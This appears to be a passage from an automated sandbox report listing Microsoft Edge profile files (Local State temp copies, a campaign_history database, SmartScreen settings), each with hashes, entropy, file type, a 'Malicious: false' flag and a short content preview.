Entropy (8bit):	6.101664206419602
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7ynQCBS2qX7bltPHgorQXdbiR3oM:z/0+zI7ynQkS201tP0Xdbe3
MD5:	55F765454974C8C1DE5455DD5AAE690E
SHA1:	809AA4EAA7D787DF8FA22E45C4BAB099814F8952
SHA-256:	5AF3F33591CBB5B8BD8AE7E036FAB30F943B297BD0A262DEB7ECDF9DCA551B97
SHA-512:	CF9003D5879A82076AC93658C3BF97EAFB829B9D7E77FB6572D4E4918E196B9E9C2CB2D59B71751F53D3BF48F985BFA8DA2CD5021995E4DA88654B572B5A6CDF
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF31d1e.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	58444
Entropy (8bit):	6.101664206419602
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7ynQCBS2qX7bltPHgorQXdbiR3oM:z/0+zI7ynQkS201tP0Xdbe3
MD5:	55F765454974C8C1DE5455DD5AAE690E
SHA1:	809AA4EAA7D787DF8FA22E45C4BAB099814F8952
SHA-256:	5AF3F33591CBB5B8BD8AE7E036FAB30F943B297BD0A262DEB7ECDF9DCA551B97
SHA-512:	CF9003D5879A82076AC93658C3BF97EAFB829B9D7E77FB6572D4E4918E196B9E9C2CB2D59B71751F53D3BF48F985BFA8DA2CD5021995E4DA88654B572B5A6CDF
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF31d9b.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	58444
Entropy (8bit):	6.101664206419602
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7ynQCBS2qX7bltPHgorQXdbiR3oM:z/0+zI7ynQkS201tP0Xdbe3
MD5:	55F765454974C8C1DE5455DD5AAE690E
SHA1:	809AA4EAA7D787DF8FA22E45C4BAB099814F8952
SHA-256:	5AF3F33591CBB5B8BD8AE7E036FAB30F943B297BD0A262DEB7ECDF9DCA551B97
SHA-512:	CF9003D5879A82076AC93658C3BF97EAFB829B9D7E77FB6572D4E4918E196B9E9C2CB2D59B71751F53D3BF48F985BFA8DA2CD5021995E4DA88654B572B5A6CDF
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF31e85.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	58444
Entropy (8bit):	6.101664206419602
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7ynQCBS2qX7bltPHgorQXdbiR3oM:z/0+zI7ynQkS201tP0Xdbe3
MD5:	55F765454974C8C1DE5455DD5AAE690E
SHA1:	809AA4EAA7D787DF8FA22E45C4BAB099814F8952
SHA-256:	5AF3F33591CBB5B8BD8AE7E036FAB30F943B297BD0A262DEB7ECDF9DCA551B97
SHA-512:	CF9003D5879A82076AC93658C3BF97EAFB829B9D7E77FB6572D4E4918E196B9E9C2CB2D59B71751F53D3BF48F985BFA8DA2CD5021995E4DA88654B572B5A6CDF
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF31ea5.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	58444
Entropy (8bit):	6.101664206419602
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7ynQCBS2qX7bltPHgorQXdbiR3oM:z/0+zI7ynQkS201tP0Xdbe3
MD5:	55F765454974C8C1DE5455DD5AAE690E
SHA1:	809AA4EAA7D787DF8FA22E45C4BAB099814F8952
SHA-256:	5AF3F33591CBB5B8BD8AE7E036FAB30F943B297BD0A262DEB7ECDF9DCA551B97
SHA-512:	CF9003D5879A82076AC93658C3BF97EAFB829B9D7E77FB6572D4E4918E196B9E9C2CB2D59B71751F53D3BF48F985BFA8DA2CD5021995E4DA88654B572B5A6CDF
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF34835.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	58444
Entropy (8bit):	6.101664206419602
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7ynQCBS2qX7bltPHgorQXdbiR3oM:z/0+zI7ynQkS201tP0Xdbe3
MD5:	55F765454974C8C1DE5455DD5AAE690E
SHA1:	809AA4EAA7D787DF8FA22E45C4BAB099814F8952
SHA-256:	5AF3F33591CBB5B8BD8AE7E036FAB30F943B297BD0A262DEB7ECDF9DCA551B97
SHA-512:	CF9003D5879A82076AC93658C3BF97EAFB829B9D7E77FB6572D4E4918E196B9E9C2CB2D59B71751F53D3BF48F985BFA8DA2CD5021995E4DA88654B572B5A6CDF
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF34874.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	58444
Entropy (8bit):	6.101664206419602
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7ynQCBS2qX7bltPHgorQXdbiR3oM:z/0+zI7ynQkS201tP0Xdbe3
MD5:	55F765454974C8C1DE5455DD5AAE690E
SHA1:	809AA4EAA7D787DF8FA22E45C4BAB099814F8952
SHA-256:	5AF3F33591CBB5B8BD8AE7E036FAB30F943B297BD0A262DEB7ECDF9DCA551B97
SHA-512:	CF9003D5879A82076AC93658C3BF97EAFB829B9D7E77FB6572D4E4918E196B9E9C2CB2D59B71751F53D3BF48F985BFA8DA2CD5021995E4DA88654B572B5A6CDF
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3497d.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	58444
Entropy (8bit):	6.101664206419602
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7ynQCBS2qX7bltPHgorQXdbiR3oM:z/0+zI7ynQkS201tP0Xdbe3
MD5:	55F765454974C8C1DE5455DD5AAE690E
SHA1:	809AA4EAA7D787DF8FA22E45C4BAB099814F8952
SHA-256:	5AF3F33591CBB5B8BD8AE7E036FAB30F943B297BD0A262DEB7ECDF9DCA551B97
SHA-512:	CF9003D5879A82076AC93658C3BF97EAFB829B9D7E77FB6572D4E4918E196B9E9C2CB2D59B71751F53D3BF48F985BFA8DA2CD5021995E4DA88654B572B5A6CDF
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3705f.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	58444
Entropy (8bit):	6.101664206419602
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7ynQCBS2qX7bltPHgorQXdbiR3oM:z/0+zI7ynQkS201tP0Xdbe3
MD5:	55F765454974C8C1DE5455DD5AAE690E
SHA1:	809AA4EAA7D787DF8FA22E45C4BAB099814F8952
SHA-256:	5AF3F33591CBB5B8BD8AE7E036FAB30F943B297BD0A262DEB7ECDF9DCA551B97
SHA-512:	CF9003D5879A82076AC93658C3BF97EAFB829B9D7E77FB6572D4E4918E196B9E9C2CB2D59B71751F53D3BF48F985BFA8DA2CD5021995E4DA88654B572B5A6CDF
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3ab74.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	58444
Entropy (8bit):	6.101664206419602
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7ynQCBS2qX7bltPHgorQXdbiR3oM:z/0+zI7ynQkS201tP0Xdbe3
MD5:	55F765454974C8C1DE5455DD5AAE690E
SHA1:	809AA4EAA7D787DF8FA22E45C4BAB099814F8952
SHA-256:	5AF3F33591CBB5B8BD8AE7E036FAB30F943B297BD0A262DEB7ECDF9DCA551B97
SHA-512:	CF9003D5879A82076AC93658C3BF97EAFB829B9D7E77FB6572D4E4918E196B9E9C2CB2D59B71751F53D3BF48F985BFA8DA2CD5021995E4DA88654B572B5A6CDF
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6773696719930975
Encrypted:	false
SSDEEP:	12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
MD5:	6FFCCB198DC6B17E165460E6E246B03C
SHA1:	014A46B0E6E84089E1C20FA232F54CA737D5F023
SHA-256:	D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
SHA-512:	846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	47
Entropy (8bit):	4.3818353308528755
Encrypted:	false
SSDEEP:	3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
MD5:	48324111147DECC23AC222A361873FC5
SHA1:	0DF8B2267ABBDBD11C422D23338262E3131A4223
SHA-256:	D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
SHA-512:	E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
Malicious:	false
Preview:	customSettings_F95BA787499AB4FA9EFFF472CE383A14

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	35
Entropy (8bit):	4.014438730983427
Encrypted:	false
SSDEEP:	3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
MD5:	BB57A76019EADEDC27F04EB2FB1F1841
SHA1:	8B41A1B995D45B7A74A365B6B1F1F21F72F86760
SHA-256:	2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
SHA-512:	A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
Malicious:	false
Preview:	{"forceServiceDetermination":false}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	81
Entropy (8bit):	4.3439888556902035
Encrypted:	false
SSDEEP:	3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
MD5:	177F4D75F4FEE84EF08C507C3476C0D2
SHA1:	08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
SHA-256:	21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
SHA-512:	94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
Malicious:	false
Preview:	edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	130439
Entropy (8bit):	3.80180718117079
Encrypted:	false
SSDEEP:	1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
MD5:	EB75CEFFE37E6DF9C171EE8380439EDA
SHA1:	F00119BA869133D64E4F7F0181161BD47968FA23
SHA-256:	48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
